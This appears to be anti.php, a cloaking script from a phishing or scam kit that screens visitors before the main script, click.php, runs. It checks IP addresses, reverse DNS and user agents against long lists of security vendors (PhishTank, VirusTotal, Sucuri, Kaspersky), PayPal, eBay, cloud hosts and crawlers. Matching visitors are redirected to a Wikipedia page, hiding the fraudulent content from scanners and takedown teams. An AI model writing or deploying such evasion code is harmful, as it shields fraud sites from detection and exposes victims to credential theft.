File: /home/nciq25gegoxa/public_html/ha8x/anti.php
<?php
// --- Function to get the real IP address ---
function getRealIpAddress() {
$ip = '';
if (getenv('HTTP_CLIENT_IP')) {
$ip = getenv('HTTP_CLIENT_IP');
} elseif (getenv('HTTP_X_FORWARDED_FOR')) {
$ip = getenv('HTTP_X_FORWARDED_FOR');
} elseif (getenv('HTTP_X_FORWARDED')) {
$ip = getenv('HTTP_X_FORWARDED');
} elseif (getenv('HTTP_FORWARDED_FOR')) {
$ip = getenv('HTTP_FORWARDED_FOR');
} elseif (getenv('HTTP_FORWARDED')) {
$ip = getenv('HTTP_FORWARDED');
} elseif (getenv('REMOTE_ADDR')) {
$ip = getenv('REMOTE_ADDR');
}
// Handle comma-separated IPs from proxies (take the first one)
if (strpos($ip, ',') !== false) {
$ips = explode(',', $ip);
$ip = trim($ips[0]);
}
return $ip;
}
$ipaddress = getRealIpAddress();
$userAgent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
// --- Whitelist Check for Specific User-Agents ---
// If the User-Agent is one of these specific strings, skip all other checks.
$whitelistedUserAgents = [
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)",
"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)",
"Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b",
"Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 530) like Gecko BingPreview/1.0b",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Applebot/0.1; +http://www.apple.com/go/applebot)"
];
if (in_array($userAgent, $whitelistedUserAgents)) {
// Allow the request to proceed
return; // or simply do nothing and let the script continue
}
// --- Specific Allowed Keywords in User-Agent ---
// If the User-Agent contains one of these, skip main checks.
$allowedKeywords = [
'favicon', 'Java', 'FreeBSD', 'msnbot', 'Yahoo! Slurp', 'YahooSeeker',
'Googlebot', 'bingbot', 'crawler', 'PycURL', 'facebookexternalhit'
];
$allowRequest = false;
foreach ($allowedKeywords as $keyword) {
if (stripos($userAgent, $keyword) !== false) {
$allowRequest = true;
break;
}
}
if ($allowRequest) {
// Allow the request to proceed
return;
}
// --- Block Lists ---
// List of words/IP patterns that identify bad bots, scanners, hosts
$blockedWords = [
// --- Hosting Providers / Data Centers / Known Bots ---
"above", "google", "softlayer", "amazonaws", "cyveillance", "phishtank",
"dreamhost", "netpilot", "calyxinstitute", "tor-exit", "msnbot", "p3pwgdsn",
"netcraft", "trendmicro", "ebay", "paypal", "torservers", "messagelabs",
"sucuri.net", "crawler", "duckduck", "feedfetcher", "BitDefender", "mcafee",
"antivirus", "cloudflare", "p3pwgdsn", "avg", "avira", "avast", "ovh.net",
"security", "twitter", "bitdefender", "virustotal", "phising", "clamav",
"baidu", "safebrowsing", "eset", "mailshell", "azure", "miniature", "tlh.ro",
"aruba", "dyn.plus.net", "pagepeeker", "SPRO-NET-207-70-0", "SPRO-NET-209-19-128",
"vultr", "colocrossing.com", "geosr", "drweb", "dr.web", "linode.com",
"opendns", 'cymru.com', 'sl-reverse.com', 'surriel.com', 'hosting',
'orange-labs', 'speedtravel', 'metauri', 'apple.com', 'bruuk.sk', 'sysms.net',
'oracle', 'cisco', 'amuri.net', "versanet.de", "hilfe-veripayed.com",
"007ac9", "008", "4seohuntbot", "50.nu", "80legs.com/webcrawler", "192.comagent",
"200pleasebot", "360spider", "a6-indexer", "aboundexbot", "aboutusbot",
"above", "abrave spider", "accelobot", "acoonbot", "acunetix", "addthis.com",
"admantx", "adsbot-google", "AhrefsBot", "ahrefsbot", "alexabot", "amagit.com",
"amazonaws", "amznkassocbot", "analytics", "antbot", "apache-httpclient",
"apercite", "aportworm", "arabot", "Baiduspider", "BazQuxBot", "bingbot",
"bot", "Butterfly", "calyxinstitute", "compatible", "crawler", "cyveillance",
"Dr.Web", "dreamhost", "drweb", "ebay", "echo blinde kuh", "Exabot", "Ezooms",
"facebook", "facebookexternalhit", "Feedfetcher-Google", "Feedly", "google",
"Googlebot", "GrapeshotCrawler", "grokkit-crawler", "hostinger", "InAGist",
"jetbrains", "Kraken", "lssrocketcrawler", "magpie-crawler", "MaxPointCrawler",
"Mediapartners-Google", "merlinkbot", "messagelabs", "MJ12bot", "mon.itor.us",
"msnbot", "netcraft", "NetcraftSurveyAgent", "netpilot",
"NetSeer crawler", "netsparker", "NING", "p3pwgdsn", "PaperLiBot", "paypal",
"PercolateCrawler", "phishtank", "picsearch", "PrintfulBot", "PulseCrawler",
"Python-urllib", "QuerySeekerSpider", "R6_CommentReader", "R6_FeedFetcher",
"scanurl", "SearchmetricsBot", "shai", "hulud", "ShowyouBot", "SISTRIX Crawler",
"SMXCrawler", "softlayer", "Sogou web spider", "spam", "spbot", "Spinn3r",
"sucuri.net", "TencentTraveler", "tor-exit", "torservers", "trendmicro",
"Trident", "TweetedTimes Bot", "TweetmemeBot", "Twitterbot", "UnwindFetchor",
"urlredirectresolver", "urlresolver", "wildferret", "windows 95", "windows 98",
"Windows XP", "windows xp", "woriobot", "X11", "Y!J-BRW", "Yahoo! Slurp",
"yahoo!", "YandexBot", "kaspersky", "sophos", "virustotal", "virus",
"Genieo", "BomboraBot", "CCBot", "URLAppendBot", "DomainAppender",
"msnbot-media", "Antivirus", "YoudaoBot", "MJ12bot", "linkdexbot",
"Go-http-client", "presto", "BingPreview", "go-http-client",
"go-http-client/1.1", "trident", "presto", "virustotal", "unchaos",
"dreampassport", "sygol", "nutch", "privoxy", "zipcommander", "neofonie",
"abacho", "acoi", "acoon", "adaxas", "agada", "aladin", "alkaline",
"amibot", "anonymizer", "aplix", "aspseek", "avant", "baboom", "anzwers",
"anzwerscrawl", "crawlconvera", "del.icio.us", "camehttps", "annotate",
"wapproxy", "translate", "feedfetcher", "ask24", "asked", "askaboutoil",
"fangcrawl", "amzn_assoc", "bingpreview", "dr.web", "drweb", "bilbo",
"blackwidow", "sogou", "sogou-test-spider", "exabot", "externalhit",
"ia_archiver", "mj12", "okhttp", "simplepie", "curl", "wget", "virus",
"pipes", "antivirus", "python", "ruby", "avast", "firebird", "scmguard",
"adsbot", "weblight", "favicon", "analytics", "insights", "headless",
"github", "node", "agusescan", "zteopen", "bot", "docomo", "mediapartners",
"phantomjs", "lighthouse", "reverseshorturl", "samsung-sgh-e250", "gsa-crawler",
"preview", "whatsapp", "telegram", "instagram", "icoreservice",
// --- Large list of individual bot/crawler names ---
"accoona", "acoon", "adressendeutschland", "ah-ha.com", "ahoy", "altavista",
"ananzi", "anthill", "appie", "arachnophilia", "arale", "araneo", "aranha",
"architext", "aretha", "arks", "asterias", "atlocal", "atn", "atomz",
"augurfind", "backrub", "bannana_bot", "baypup", "bdfetch", "big brother",
"biglotron", "bjaaland", "blackwidow", "blaiz", "blog", "blo.", "bloodhound",
"boitho", "booch", "bradley", "butterfly", "calif", "cassandra", "ccubee",
"cfetch", "charlotte", "churl", "cienciaficcion", "cmc", "collective",
"comagent", "combine", "computingsite", "csci", "cusco", "daumoa", "deepindex",
"delorie", "depspid", "deweb", "die blinde kuh", "digger", "ditto", "dmoz",
"docomo", "download express", "dtaagent", "dwcp", "ebiness", "ebingbong",
"e-collector", "ejupiter", "emacs-w3 search engine", "esther", "evliya celebi",
"ezresult", "falcon", "felix ide", "ferret", "fetchrover", "fido", "findlinks",
"fireball", "fish search", "fouineur", "funnelweb", "gazz", "gcreep",
"genieknows", "getterroboplus", "geturl", "glx", "goforit", "golem", "grabber",
"grapnel", "gralon", "griffon", "gromit", "grub", "gulliver", "hamahakki",
"harvest", "havindex", "helix", "heritrix", "hku www octopus", "homerweb",
"htdig", "html index", "html_analyzer", "htmlgobble", "hubater",
"hyper-decontextualizer", "ia_archiver", "ibm_planetwide", "ichiro",
"iconsurf", "iltrovatore", "image.kapsi.net", "imagelock", "incywincy",
"indexer", "infobee", "informant", "ingrid", "inktomisearch.com",
"inspector web", "intelliagent", "internet shinchakubin", "ip3000", "iron33",
"israeli-search", "ivia", "jack", "jakarta", "javabee", "jetbot",
"jumpstation", "katipo", "kdd-explorer", "kilroy", "knowledge", "kototoi",
"kretrieve", "labelgrabber", "lachesis", "larbin", "legs", "libwww",
"linkalarm", "link validator", "linkscan", "lockon", "lwp", "lycos", "magpie",
"mantraagent", "mapoftheinternet", "marvin/", "mattie", "mediafox",
"mediapartners", "mercator", "merzscope", "microsoft url control", "minirank",
"miva", "mj12", "mnogosearch", "moget", "monster", "moose", "motor",
"multitext", "muncher", "muscatferret", "mwd.search", "myweb", "najdi",
"nameprotect", "nationaldirectory", "nazilla", "ncsa beta", "nec-meshexplorer",
"nederland.zoek", "netcarta webmap engine", "netmechanic", "netresearchserver",
"netscoop", "newscan-online", "nhse", "nokia6682/", "nomad", "noyona",
"siteexplorer", "nutch", "nzexplorer", "objectssearch", "occam", "omni",
"open text", "openfind", "openintelligencedata", "orb search", "osis-project",
"pack rat", "pageboy", "pagebull", "page_verifier", "panscient", "parasite",
"partnersite", "patric", "pear.", "pegasus", "peregrinator", "pgp key agent",
"phantom", "phpdig", "picosearch", "piltdownman", "pimptrain", "pinpoint",
"pioneer", "piranha", "plumtreewebaccessor", "pogodak", "poirot", "pompos",
"poppelsdorf", "poppi", "popular iconoclast", "psycheclone", "publisher",
"python", "rambler", "raven search", "roach", "road runner", "roadhouse",
"robbie", "robofox", "robozilla", "rules", "salty", "sbider", "scooter",
"scoutjet", "scrubby", "search.", "searchprocess", "semanticdiscovery",
"senrigan", "sg-scout", "shai'hulud", "shark", "shopwiki", "sidewinder",
"sift", "silk", "simmany", "site searcher", "site valet", "sitetech-rover",
"skymob.com", "sleek", "smartwit", "sna-", "snappy", "snooper", "sohu",
"speedfind", "sphere", "sphider", "spinner", "spyder", "steeler/", "suke",
"suntek", "supersnooper", "surfnomore", "sven", "sygol", "szukacz",
"tach black widow", "tarantula", "templeton", "/teoma", "t-h-u-n-d-e-r-s-t-o-n-e",
"theophrastus", "titan", "titin", "tkwww", "toutatis", "t-rex", "tutorgig",
"twiceler", "twisted", "ucsd", "udmsearch", "url check", "updated",
"vagabondo", "valkyrie", "verticrawl", "victoria", "vision-search", "volcano",
"voyager/", "voyager-hc", "w3c_validator", "w3m2", "w3mir", "walker",
"wallpaper", "wanderer", "wauuu", "wavefire", "web core", "web hopper",
"web wombat", "webbandit", "webcatcher", "webcopy", "webfoot", "weblayers",
"weblinker", "weblog monitor", "webmirror", "webmonkey", "webquest",
"webreaper", "websitepulse", "websnarf", "webstolperer", "webvac", "webwalk",
"webwatch", "webwombat", "webzinger", "wget", "whizbang", "whowhere",
"wild ferret", "worldlight", "wwwc", "wwwster", "xenu", "xget", "xift",
"xirq", "yandex", "yanga", "yeti", "yodao", "zao/", "zippp", "zyborg",
"proximic", "Cliqzbot", "YoudaoBot", "linkdexbot",
// --- Bot signature fragments ---
"abot", "dbot", "ebot", "hbot", "kbot", "lbot", "mbot", "nbot", "obot",
"pbot", "rbot", "sbot", "tbot", "vbot", "ybot", "zbot", "bot.", "bot/",
"_bot", ".bot", "/bot", "-bot", ":bot", "(bot", "crawl", "slurp", "spider",
"seek"
];
// Array of IP address patterns/ranges to block
$bannedIPPatterns = [
"66.249.91.*", "66.249.91.203", "^81.161.59.*", "^66.135.200.*", "^66.102.*.*",
"^38.100.*.*", "^107.170.*.*", "^74.125.*.*", "^208.65.144.*", "^72.14.192.*",
"^209.85.128.*", "^216.239.32.*", "^64.233.160.*", "^207.126.144.*",
"^199.59.148.*", "^193.253.199.*", "^69.65.*.*", "^50.7.*.*", "^198.54.*.*",
"^192.115.134.*", "^216.252.167.*", "^193.220.178.*", "68.65.53.71",
"^198.25.*.*", "^64.106.213.*", "^94.26.*.*", "^95.85.*.*", "^72.52.96.*",
"^212.8.79.*", "^62.99.77.*", "^202.108.252.*", "^193.47.80.*",
"^64.62.136.*", "^66.221.*.*", "^64.62.175.*", "^158.108.*.*",
"^168.188.*.*", "^66.207.120.*", "^167.24.*.*", "^192.118.48.*",
"^67.209.128.*", "^12.148.209.*", "^12.148.196.*", "^35.172.115.*",
"^54.164.*.*", "^222.154.252.*", "^195.211.23.*", "^13.57.36.*",
"^210.55.200.*", "^42.112.8.*", "109.195.113.89", "80.245.118.54",
"194.60.239.139"
];
// --- Perform Checks ---
// echo $userAgent;
// 1. Check User-Agent against blocked words
foreach ($blockedWords as $word) {
if (stripos($userAgent, $word) !== false) {
// Match found, block access
header('Location: https://en.wikipedia.org/wiki/Art');
exit();
}
}
// 2. Check Hostname (reverse DNS) against blocked words
$hostname = @gethostbyaddr($ipaddress); // Suppress errors with @
if ($hostname !== false && $hostname !== $ipaddress) { // Only check if RDNS returned a name
foreach ($blockedWords as $word) {
// Use substr_count for partial matches in hostname
if (substr_count(strtolower($hostname), strtolower($word)) > 0) {
// Match found, block access
header('Location: https://en.wikipedia.org/wiki/Art');
exit();
}
}
}
// 3. Check IP address against banned patterns
foreach ($bannedIPPatterns as $pattern) {
// Convert pattern (e.g., "^192.168.1.*" or "192.168.1.100") to regex
$regex = str_replace(
['.', '*', '^'],
['\.', '.*', '^'],
$pattern
);
if (preg_match("/$regex/", $ipaddress)) {
// Match found, block access
header('Location: https://en.wikipedia.org/wiki/Art');
exit();
}
}
// If none of the checks triggered, the request is allowed to proceed.
// The main script (click.php) will continue execution.
?>